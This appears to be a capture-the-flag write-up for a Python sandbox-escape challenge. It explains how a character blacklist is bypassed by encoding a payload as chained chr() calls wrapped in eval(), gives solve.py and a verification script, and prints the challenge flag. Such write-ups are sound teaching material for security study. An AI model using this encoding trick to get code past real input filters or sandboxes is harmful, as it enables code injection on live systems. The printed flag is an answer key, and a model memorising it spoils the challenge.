Level 3

Challenge details

Solution

Below is the source code of the challenge. A quick look shows that this time the restriction is the set of characters listed in the line filter_set = set('"\'`ib'): double quote, single quote, backtick, i and b. Any input containing one of them is rejected. That rules out writing import or breakpoint() directly (both contain i and b), and it rules out string literals altogether, since every quote character is banned, so concatenating string literals is not an option either.

As you can see in the figure below, I tried to input different payloads that I could think of. But none of them worked.

I tried the linecache module as well, thinking that it already has the os module imported so that I could avoid the import keyword. But yeah, after sending the line over I realized that it contains i and " too 😂. At this point I was just poking around with random commands and functions.

And then something came to mind: what about writing each character of the payload in a different representation? Hey, it works!

Here's an ASCII table for reference. For instance, we can produce the letter b by giving Python its decimal code, which is 98, as chr(98). The name chr, the digits, the parentheses and the + used to join the pieces are all outside the filter set, so the banned characters never appear in what we send.

Converting the entire payload character by character by hand is too much work, so I wrote a script to automate the process and make my life easier (especially at midnight, when I was damn sleepy 🥲).

solve.py
def ascii_to_decimal_string(input_string):
    decimal_values = [ord(char) for char in input_string]
    output_string = '+'.join([f"chr({value})" for value in decimal_values])
    return output_string

def main():
    # Get user input
    input_string = input("Enter an ASCII string: ")

    # Convert ASCII to decimal string representation
    output_string = ascii_to_decimal_string(input_string)

    # Display the result
    print("Output string:", output_string)

if __name__ == "__main__":
    main()

Let's test the script. Run it and enter the plain-text code to convert. Ayeee, that's the output I was expecting.

Wrapping the payload in eval() and sending it to the server showed that the PoC works like a charm.

Now for the final step: convert the real payload with the script.

Wrap the resulting string in eval() and we receive the flag.
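The whole procedure above (encode with chr(), wrap in eval(), send) as one added example; this is not the writeup's solve.py or the challenge's own code. It also adds the local check a practitioner wants before sending anything: confirm that the finished payload shares no character with the filter set. The check assumes the challenge rejects input when set(input) & filter_set is non-empty, which the writeup does not show (only the filter_set line is quoted). The demo payload `__import__('os').getcwd()` is a stand-in; the writeup does not print its final payload.

```python
"""Added example, not the writeup's own solve.py: encode a payload as chr()
arithmetic, wrap it in eval(), and verify locally that nothing from the
blacklist survives before sending it to the server."""

# Blacklist quoted in the writeup: double quote, single quote, backtick, i, b.
FILTER_SET = set('"\'`ib')


def chr_encode(payload: str) -> str:
    """Return an expression built only from chr(), digits, '+' and parentheses
    that evaluates to `payload`, e.g. 'b' -> 'chr(98)'."""
    return "+".join(f"chr({ord(ch)})" for ch in payload)


def wrap_eval(payload: str) -> str:
    """The encoded expression only *produces* the string; eval() runs it.
    Neither 'eval' nor 'chr' contains a blacklisted character."""
    return f"eval({chr_encode(payload)})"


def banned_chars(expr: str, filter_set=FILTER_SET) -> set:
    """Characters of expr that the blacklist catches. Assumption: the challenge
    rejects input when set(input) & filter_set is non-empty (the writeup only
    quotes the filter_set line, not the check itself)."""
    return set(expr) & filter_set


def build(payload: str, filter_set=FILTER_SET) -> str:
    """Encode, wrap and verify. Raises if this encoding would still trip the
    filter, e.g. if 'c', 'h', 'r', '+' or a digit were banned as well."""
    wrapped = wrap_eval(payload)
    leaked = banned_chars(wrapped, filter_set)
    if leaked:
        raise ValueError(f"encoding still contains banned characters: {sorted(leaked)}")
    return wrapped


if __name__ == "__main__":
    # Stand-in payload for the demo; the writeup does not print its final one.
    demo = "__import__('os').getcwd()"
    print("raw payload is caught by:", sorted(banned_chars(demo)))
    print("send this:", build(demo))
    print("decodes back to:", eval(chr_encode(demo)))
```

The outer eval() matters: on its own the chr() chain is just an expression that evaluates to a string, so the server would build the text of the payload and do nothing with it. Feeding that string to eval() is what makes it run.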

Flag

GCTF2023{Lev3l_thr33_Y0u_ar3_insan3}
